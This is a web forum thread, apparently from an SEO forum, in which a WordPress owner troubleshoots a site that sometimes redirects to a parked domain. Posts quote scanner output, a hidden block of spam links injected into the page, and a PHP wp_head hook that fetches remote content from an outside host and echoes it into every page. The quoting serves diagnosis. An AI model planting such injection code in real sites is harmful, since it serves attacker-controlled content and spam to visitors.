How to check if my site got SQL injected/hacked?

 

Results 1 to 16 of 16
Sometimes(rarely) when I go to my domain it redirects it to a parked domain, when ...
  1. #1
    Russian-Czar's Avatar
    Russian-Czar is offline Regular Member
    Join Date
    Feb 2012
    Posts
    215
    Thanks
    106
    Thanked 57 Times in 38 Posts

    Default How to check if my site got SQL injected/hacked?

    Sometimes(rarely) when I go to my domain it redirects it to a parked domain, when I retry it works fine. I happens rarely about 20 to 1. Not sure if its my computer or the site.



    How to check if my site got SQL injected or hacked some other way?




  2. #2
    cody41's Avatar
    cody41 is offline Power Member
    Join Date
    Jun 2009
    Location
    Texas
    Posts
    684
    Thanks
    35
    Thanked 258 Times in 139 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    if you're running a php based site, go ahead and search your theme or site code for base64 that shouldn't be there. That might be a good start

  3. The Following User Says Thank You to cody41 For This Useful Post:

    Russian-Czar (05-13-2013)

  4. #3
    Russian-Czar's Avatar
    Russian-Czar is offline Regular Member
    Join Date
    Feb 2012
    Posts
    215
    Thanks
    106
    Thanked 57 Times in 38 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    Quote Originally Posted by cody41 View Post
    if you're running a php based site, go ahead and search your theme or site code for base64 that shouldn't be there. That might be a good start
    Thanks for reply, Not sure how to do that, I will google it but if you could explain; are you talking about the .php files or the SQL database.

  5. #4
    Russian-Czar's Avatar
    Russian-Czar is offline Regular Member
    Join Date
    Feb 2012
    Posts
    215
    Thanks
    106
    Thanked 57 Times in 38 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    Found the base64 in my PHP files

    Code:
    Timthumb.php  -  51.691 bytes  -  Sat, 12.01.13 at 21:43  -  \wp-content\Themes\THEME\
    13.502    // base64 encoded red image that says 'no hotlinkers'
    13.602    $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
     class-feed.php  -  3.684 bytes  -  Thu, 22.11.12 at 00:23  -  \wp-includes\
    3.271    if ( $type & SIMPLEPIE_CONSTRUCT_BASE64 ) {
    3.293    $data = base64_decode( $data );
    
    
     class-http.php  -  58.772 bytes  -  Fri, 25.01.13 at 17:17  -  \wp-includes\
    46.547    return 'Proxy-Authorization: Basic ' . base64_encode( $this->authentication() );
     class-IXR.php  -  31.675 bytes  -  Wed, 15.08.12 at 14:12  -  \wp-includes\
    2.970    // Deal with IXR object types base64 and date
    3.155    if (is_object($this->data) && is_a($this->data, 'IXR_Base64')) {
    3.187    return 'base64';
    5.016    case 'base64':
    10.042    case 'base64':
    10.076    $value = base64_decode($this->_currentTagContents);
    25.459    * IXR_Base64
    25.513    class IXR_Base64
    25.555    function IXR_Base64($data)
    25.656    return '<base64>'.base64_encode($this->data).'</base64>';
    25.665    return '<base64>'.base64_encode($this->data).'</base64>';
    25.695    return '<base64>'.base64_encode($this->data).'</base64>';
    28.484    case 'base64':
    30.447    case 'base64':
    30.496    $return[] = new IXR_Base64('base64');
    30.504    $return[] = new IXR_Base64('base64');
     class-phpmailer.php  -  81.728 bytes  -  Mon, 25.06.12 at 21:54  -  \wp-includes\
    2.745    *  "8bit", "7bit", "binary", "base64", and "quoted-printable".
    48.985    public function AddAttachment($path, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    52.434    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    52.612    protected function EncodeFile($path, $encoding = 'base64') {
    53.774    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    53.924    public function EncodeString($str, $encoding = 'base64') {
    54.002    case 'base64':
    54.042    $encoded = chunk_split(base64_encode($str), 76, $this->LE);
    56.065    $encoded = $this->Base64EncodeWrapMB($str);
    56.125    $encoded = base64_encode($str);
    57.424    public function Base64EncodeWrapMB($str) {
    57.774    // Base64 has a 4:3 ratio
    58.062    $chunk = base64_encode($chunk);
    63.363    public function AddStringAttachment($string, $filename, $encoding = 'base64', $type = 'application/octet-stream') {
    64.373    public function AddEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    64.986    public function AddStringEmbeddedImage($string, $cid, $filename = '', $encoding = 'base64', $type = 'application/octet-stream') {
    71.060    if ( $this->AddEmbeddedImage($basedir.$directory.$filename, md5($filename), $filename, 'base64', $mimeType) ) {
    77.921    return base64_encode($signature);
    80.309    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
    80.353    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
     class-simplepie.php  -  90.453 bytes  -  Mon, 05.11.12 at 07:25  -  \wp-includes\
    7.558    * base64-encoded construct
    7.615    define('SIMPLEPIE_CONSTRUCT_BASE64', 8);
     class-smtp.php  -  24.618 bytes  -  Tue, 07.02.12 at 09:13  -  \wp-includes\
    7.639    fputs($this->smtp_conn, base64_encode($username) . $this->CRLF);
    8.154    fputs($this->smtp_conn, base64_encode($password) . $this->CRLF);
     class-snoopy.php  -  37.774 bytes  -  Wed, 27.10.10 at 03:54  - \wp-includes\
    25.678    $headers .= "Authorization: Basic ".base64_encode($this->user.":".$this->pass)."\r\n";
    25.841    $headers .= 'Proxy-Authorization: ' . 'Basic ' . base64_encode($this->proxy_user . ':' . $this->proxy_pass)."\r\n";
    30.573    $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass);
     File.php  -  9.678 bytes  -  Wed, 21.11.12 at 15:31  - \wp-includes\SimplePie\
    6.807    $out .= "Authorization: Basic " . base64_encode("$url_parts[user]:$url_parts[pass]") . "\r\n";
    
    
     Misc.php  -  51.559 bytes  -  Wed, 21.11.12 at 15:31  -  \wp-includes\SimplePie\
    40.331    if (isset($attribs['']['mode']) && strtolower(trim($attribs['']['mode']) === 'base64'))
    40.376    $mode = SIMPLEPIE_CONSTRUCT_BASE64;
    41.903    return SIMPLEPIE_CONSTRUCT_BASE64;
     Sanitize.php  -  15.703 bytes  -  Sun, 02.12.12 at 09:43  - \wp-includes\SimplePie\
    7.019    if ($type & SIMPLEPIE_CONSTRUCT_BASE64)
    7.044    $data = base64_decode($data);

  6. #5
    accelerator_dd is online now Jr. VIP
    Join Date
    May 2010
    Location
    IM Wonderland
    Posts
    1,253
    Thanks
    484
    Thanked 540 Times in 312 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    Quote Originally Posted by Russian-Czar View Post
    Found the base64 in my PHP files

    Code:
    Timthumb.php  -  51.691 bytes  -  Sat, 12.01.13 at 21:43  -  \wp-content\Themes\THEME\
    13.502    // base64 encoded red image that says 'no hotlinkers'
    13.602    $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
     class-feed.php  -  3.684 bytes  -  Thu, 22.11.12 at 00:23  -  \wp-includes\
    3.271    if ( $type & SIMPLEPIE_CONSTRUCT_BASE64 ) {
    3.293    $data = base64_decode( $data );
    
    
     class-http.php  -  58.772 bytes  -  Fri, 25.01.13 at 17:17  -  \wp-includes\
    46.547    return 'Proxy-Authorization: Basic ' . base64_encode( $this->authentication() );
     class-IXR.php  -  31.675 bytes  -  Wed, 15.08.12 at 14:12  -  \wp-includes\
    2.970    // Deal with IXR object types base64 and date
    3.155    if (is_object($this->data) && is_a($this->data, 'IXR_Base64')) {
    3.187    return 'base64';
    5.016    case 'base64':
    10.042    case 'base64':
    10.076    $value = base64_decode($this->_currentTagContents);
    25.459    * IXR_Base64
    25.513    class IXR_Base64
    25.555    function IXR_Base64($data)
    25.656    return '<base64>'.base64_encode($this->data).'</base64>';
    25.665    return '<base64>'.base64_encode($this->data).'</base64>';
    25.695    return '<base64>'.base64_encode($this->data).'</base64>';
    28.484    case 'base64':
    30.447    case 'base64':
    30.496    $return[] = new IXR_Base64('base64');
    30.504    $return[] = new IXR_Base64('base64');
     class-phpmailer.php  -  81.728 bytes  -  Mon, 25.06.12 at 21:54  -  \wp-includes\
    2.745    *  "8bit", "7bit", "binary", "base64", and "quoted-printable".
    48.985    public function AddAttachment($path, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    52.434    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    52.612    protected function EncodeFile($path, $encoding = 'base64') {
    53.774    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    53.924    public function EncodeString($str, $encoding = 'base64') {
    54.002    case 'base64':
    54.042    $encoded = chunk_split(base64_encode($str), 76, $this->LE);
    56.065    $encoded = $this->Base64EncodeWrapMB($str);
    56.125    $encoded = base64_encode($str);
    57.424    public function Base64EncodeWrapMB($str) {
    57.774    // Base64 has a 4:3 ratio
    58.062    $chunk = base64_encode($chunk);
    63.363    public function AddStringAttachment($string, $filename, $encoding = 'base64', $type = 'application/octet-stream') {
    64.373    public function AddEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    64.986    public function AddStringEmbeddedImage($string, $cid, $filename = '', $encoding = 'base64', $type = 'application/octet-stream') {
    71.060    if ( $this->AddEmbeddedImage($basedir.$directory.$filename, md5($filename), $filename, 'base64', $mimeType) ) {
    77.921    return base64_encode($signature);
    80.309    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
    80.353    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
     class-simplepie.php  -  90.453 bytes  -  Mon, 05.11.12 at 07:25  -  \wp-includes\
    7.558    * base64-encoded construct
    7.615    define('SIMPLEPIE_CONSTRUCT_BASE64', 8);
     class-smtp.php  -  24.618 bytes  -  Tue, 07.02.12 at 09:13  -  \wp-includes\
    7.639    fputs($this->smtp_conn, base64_encode($username) . $this->CRLF);
    8.154    fputs($this->smtp_conn, base64_encode($password) . $this->CRLF);
     class-snoopy.php  -  37.774 bytes  -  Wed, 27.10.10 at 03:54  - \wp-includes\
    25.678    $headers .= "Authorization: Basic ".base64_encode($this->user.":".$this->pass)."\r\n";
    25.841    $headers .= 'Proxy-Authorization: ' . 'Basic ' . base64_encode($this->proxy_user . ':' . $this->proxy_pass)."\r\n";
    30.573    $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass);
     File.php  -  9.678 bytes  -  Wed, 21.11.12 at 15:31  - \wp-includes\SimplePie\
    6.807    $out .= "Authorization: Basic " . base64_encode("$url_parts[user]:$url_parts[pass]") . "\r\n";
    
    
     Misc.php  -  51.559 bytes  -  Wed, 21.11.12 at 15:31  -  \wp-includes\SimplePie\
    40.331    if (isset($attribs['']['mode']) && strtolower(trim($attribs['']['mode']) === 'base64'))
    40.376    $mode = SIMPLEPIE_CONSTRUCT_BASE64;
    41.903    return SIMPLEPIE_CONSTRUCT_BASE64;
     Sanitize.php  -  15.703 bytes  -  Sun, 02.12.12 at 09:43  - \wp-includes\SimplePie\
    7.019    if ($type & SIMPLEPIE_CONSTRUCT_BASE64)
    7.044    $data = base64_decode($data);
    You need to post the actual base64 dumps, such as :
    R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=
    which is the only code you posted and is just an image from what i saw (red background, nothing else in there).

    You have a listing of all the places base64 is mentioned, trace those in the files and see what they are encoding/decoding, then post those values if you need help and we can try to see what the issue is.


  7. The Following User Says Thank You to accelerator_dd For This Useful Post:

    Russian-Czar (05-13-2013)

  8. #6
    Russian-Czar's Avatar
    Russian-Czar is offline Regular Member
    Join Date
    Feb 2012
    Posts
    215
    Thanks
    106
    Thanked 57 Times in 38 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    You need to post the actual base64 dumps, such as :
    R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=
    which is the only code you posted and is just an image from what i saw (red background, nothing else in there).

    You have a listing of all the places base64 is mentioned, trace those in the files and see what they are encoding/decoding, then post those values if you need help and we can try to see what the issue is.
    I checked the files and I don't see any base64 bumps. The only code is "R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=" (the one you say is harmful) The rest of the files just use the keyword "base64"


    I have also installed a plugin that check if site is hacked or not an got this:
    Scanning Themes and Plugins for eval

    Files:
    1. /home5/clshoeso/public_html/MYDOMAIN/wp-content/plugins/quick-cache/includes/classes/menu-pages.inc.php
      53: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
      197: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
      206: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
      219: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
    2. /home5/clshoeso/public_html/MYDOMAIN/wp-content/plugins/quick-cache/includes/classes/auto-cache.inc.php
      92: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
      115: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
      145: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
    3. /home5/clshoeso/public_html/MYDOMAIN/wp-content/plugins/quick-cache/includes/classes/readmes.inc.php
      30: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
      177: eval('foreach(array_keys(get_defined_vars())as$__v )$__refs[$__v]=&$$__v;');
    4. /home5/clshoeso/public_html/MYDOMAIN/wp-content/plugins/quick-cache/includes/classes/utilities.inc.php
      22: eval("?>" . trim ($code));
    5. /home5/clshoeso/public_html/MYDOMAIN/wp-content/plugins/nxs-snap-pro-upgrade/nxs-snap-pro-upgrade.php
      25: if (!function_exists('getNSXOption')){ function getNSXOption($t){@eval($t);}}
    6. /home5/clshoeso/public_html/MYDOMAIN/wp-content/plugins/convertazon/theme-testing.php
      116: document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));


  9. #7
    twistedtrick's Avatar
    twistedtrick is offline Power Member
    Join Date
    Aug 2009
    Location
    United States
    Posts
    633
    Thanks
    236
    Thanked 343 Times in 159 Posts
    Blog Entries
    9

    Default Re: How to check if my site got SQL injected/hacked?

    I would check the backlinks for the parked domain in popular backlink checking tools, and see if your domain is seen as a backlink to it via redirect.

  10. The Following User Says Thank You to twistedtrick For This Useful Post:

    Russian-Czar (05-13-2013)

  11. #8
    Russian-Czar's Avatar
    Russian-Czar is offline Regular Member
    Join Date
    Feb 2012
    Posts
    215
    Thanks
    106
    Thanked 57 Times in 38 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    I guess it was hacked found this in the source code:



    </style>
    <div id="fb9735872" style="display:none;"></div><div style="position:absolute; top:-99999px;">
    <a href="http://www.nailpolishrack.me/nail-polish-wall-racks/" title="Nail Polish Wall Rack"><h1>Nail Polish Wall Rack</h1></a>
    <a href="http://www.emergencylightsunlimited.com/police-lights.html" title="Police Lights"><h1>Police Lights</h1></a>
    <a href="http://www.rentacarcouponcodes.com/" title="Hertz Coupon Code"><h1>Hertz Coupon Code</h1></a>
    <a href="http://showmoviesonline.net/" title="Watch free movies online"><h1>Watch free movies Online</h1></a>
    <a href="http://showmoviesonline.net/movies" title="Watch Movies Online"><h1>Watch Movies Online</h1></a>
    <a href="http://showmoviesonline.net/tv-shows" title="Watch TV Shows Online"><h1>Watch TV Shows Online</h1></a>
    <a href="http://www.gel-nailpolish.com" title="Gel Nail Polish"><h1>Gel Nail Polish</h1></a>
    <a href="http://www.gel-nailpolish.com/opi" title="OPI Nail Polish"><h1>OPI Nail Polish</h1></a>
    <a href="http://www.nailpolishrack.me/" title="Nail Polish Rack"><h1>Nail Polish Rack</h1></a>
    <img src="http://nojsstats.appspot.com/UA-38817919-3/data.com" />
    </div><!-- All in one Favicon 4.3 --><link rel="shortcut icon" href="MYDOMAIN/wp-content/uploads/2013/03/favicon1.png" />
    <style type="text/css" media="print">#wpadminbar { display:none; }</style>
    <style type="text/css" media="screen">
    html { margin-top: 28px !important; }
    * html body { margin-top: 28px !important; }
    </style>

  12. #9
    jr_sci's Avatar
    jr_sci is offline Jr. VIP
    Join Date
    Jan 2010
    Location
    No man's Land
    Posts
    841
    Thanks
    79
    Thanked 633 Times in 163 Posts
    Blog Entries
    1

    Default Re: How to check if my site got SQL injected/hacked?

    Get a penetration expert. He will charge you less than $100 to do the testing.


  13. #10
    Russian-Czar's Avatar
    Russian-Czar is offline Regular Member
    Join Date
    Feb 2012
    Posts
    215
    Thanks
    106
    Thanked 57 Times in 38 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    I think I found it could someone confirm that this is is a hack/infected code?

    Code:
    <?php
        }
    }
    
    
    function wp__head() {
     if(function_exists('curl_init'))
     {
      $url = "http://www.jqury.net/?1"; 
      $ch = curl_init();  
      $timeout = 10;  
      curl_setopt($ch,CURLOPT_URL,$url); 
      curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
      curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
      curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
      $data = curl_exec($ch);  
      curl_close($ch); 
      echo "$data";
     }
    }
    add_action('wp_head', 'wp__head');

  14. #11
    serigoramos's Avatar
    serigoramos is offline Newbies
    Join Date
    Mar 2013
    Location
    tyguain
    Posts
    8
    Thanks
    1
    Thanked 0 Times in 0 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    I think yours is a pirated wp theme....and yes your site was hacked

  15. #12
    healzer's Avatar
    healzer is offline TheProblemSolver
    Join Date
    Jun 2011
    Location
    void main() { while (1==1) { MakeMoney(); }}
    Posts
    1,690
    Thanks
    2,471
    Thanked 1,302 Times in 508 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    Zdarova,

    W3Shield can help you out with this problem, if you are looking for a website scan or penetration test, let me know and we'll get everything ready for you!

    Have a great day!

    Cheers
    healzer

  16. #13
    g0g0l's Avatar
    g0g0l is offline bit.ly/5wpsetup
    Join Date
    Sep 2010
    Posts
    2,556
    Thanks
    4,312
    Thanked 2,345 Times in 1,256 Posts
    Blog Entries
    3

  17. #14
    Join Date
    Apr 2013
    Posts
    41
    Thanks
    12
    Thanked 24 Times in 14 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    just throwing this out there. but if you paste fb9735872 into google... look at the first link.
    happened to download it myself as well. works great and all, but had to get rid of that pesky redirect

    also, why don't you go on over to that jqury site, with the ?1 and all. then view source.



    last edit: ok ok. Ill divulge the info. Don't download ubermenu from that other bh site.
    he edited one of the js files to do that. pretty nifty if i do say so myself. but he is definitely doing it wronglol.
    Last edited by isnotcomplete; 05-16-2013 at 01:18 AM.

  18. #15
    candiceswan's Avatar
    candiceswan is offline Jr. VIP
    Join Date
    Jan 2011
    Location
    NZ
    Posts
    1,013
    Thanks
    431
    Thanked 273 Times in 192 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    Quote Originally Posted by Russian-Czar View Post
    I guess it was hacked found this in the source code:
    Mine got injected too! WTF! Have you found any solution to get them removed yet? or anyone can help?

  19. #16
    garthor's Avatar
    garthor is offline Newbies
    Join Date
    Mar 2013
    Posts
    48
    Thanks
    10
    Thanked 12 Times in 9 Posts

    Default Re: How to check if my site got SQL injected/hacked?

    Quote Originally Posted by candiceswan View Post
    Mine got injected too! WTF! Have you found any solution to get them removed yet? or anyone can help?
    I don't believe your website was actually hacked... although I don't know what platform you are running or anything, but I guess you are running a Wordpress website... as far I can tell by your reply, your website has some hidden html linking to other websites, most likely it's from a nulled wordpress theme or plugin... even some "reputable" plugins insert hidden links in your website, you can try changing your themes and/or disabling your plugins.

    I believe it's the same case scenario for the OP as well...

    Also make sure to take a look at your .htaccess file as there could be a redirect somewhere to another domain.


Similar Threads

  1. Got this code injected into my site. Be aware
    By massonspy in forum Black Hat SEO
    Replies: 5
    Last Post: 02-12-2013, 11:35 PM
  2. My site got hacked by HACKED BY B4TBOY - wtf
    By walandio in forum BlackHat Lounge
    Replies: 35
    Last Post: 06-06-2012, 03:27 PM
  3. WP Site Injected - Can Anyone Decipher Code for Me?
    By nam6641 in forum BlackHat Lounge
    Replies: 7
    Last Post: 03-01-2012, 03:18 AM
  4. Replies: 13
    Last Post: 06-07-2010, 07:12 AM
  5. my site got injected!
    By mondmond88 in forum Blogging
    Replies: 10
    Last Post: 10-19-2009, 01:14 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  




BlackHatWorld on Twitter BlackHatWorld on FaceBook


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108